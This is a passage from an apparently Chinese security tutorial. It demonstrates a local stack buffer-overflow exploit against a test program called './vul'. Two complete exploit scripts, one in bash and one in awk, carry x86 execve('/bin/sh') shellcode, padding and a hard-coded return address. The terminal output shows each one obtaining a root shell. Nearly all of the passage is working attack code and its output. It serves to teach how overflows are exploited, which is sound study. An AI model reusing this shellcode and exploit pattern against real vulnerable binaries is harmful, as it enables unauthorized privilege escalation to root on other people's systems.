[cloud@test]$ cat ex.sh
#/bin/bash
# Demo for exploit bof of "./vul"
# Write by watercloud @ xfocus.org
#ENV_LEN=`env |wc -c|tr -d ' '`
SH="1\xc0PPP[YZ4\xd0\xcd\x80j\x0bX\x99Rhn/shh//biT[RSTY\xcd\x80";
AG="AA";for (( i=0;i<10;i++));do AG=$AG$AG;done ;AG=$AG$AG$AG #3096
for((i=0;i<20;i++));do AD=$AD"\xff\xbf\xe8\xf3";done #ADDR:0xbffff3e8
export AGSHELL=$AG`echo -e $SH`
for((i=0;i<4;i++)) ;do
AA=$AA"A"
if ./vul $AA`echo -e $AD`
then break
fi
done
#EOF
[cloud@test]$ chmod a+x ex.sh
[cloud@test]$ ./ex.sh
buff : A�胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?
�胯?胯?
./ex.sh: line 16: 5287 段错误 ./vul $AA`echo -e $AD`
buff : AA�胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯
?胯?胯?
sh-2.05b# id
uid=0(root) gid=503(test) groups=503(test)
sh-2.05b# exit
exit
<五> awk语言版本利用程序ex.awk
[cloud@test]$ cat ex.awk
# Demo for exploit bof of "./vul"
# Write by watercloud @ xfocus.org
BEGIN{
SH="1\xc0PPP[YZ4\xd0\xcd\x80j\x0bX\x99Rhn/shh//biT[RSTY\xcd\x80";
AG="AA";
for ( i=0;i<10;i++)
{
AG=AG""AG;
}
AG=AG""AG""AG #3096
for(i=0;i<20;i++)
{
AD=AD"\xe8\xf3\xff\xbf"; #ADDR:0xbffff3e8
}
AA="AA"
for(i=0;i<4;i++)
{
AA=AA"A"
system("./vul "AA""AD" "AG""SH)
}
}
#EOF
[cloud@test]$ gawk -f ex.awk /dev/null
buff : AAA梵�胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯??
buff : AAAA梵�胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯??
sh-2.05b# id
uid=0(root) gid=503(test) groups=503(test)
sh-2.05b#
文章来源于领测软件测试网 https://www.ltesting.net/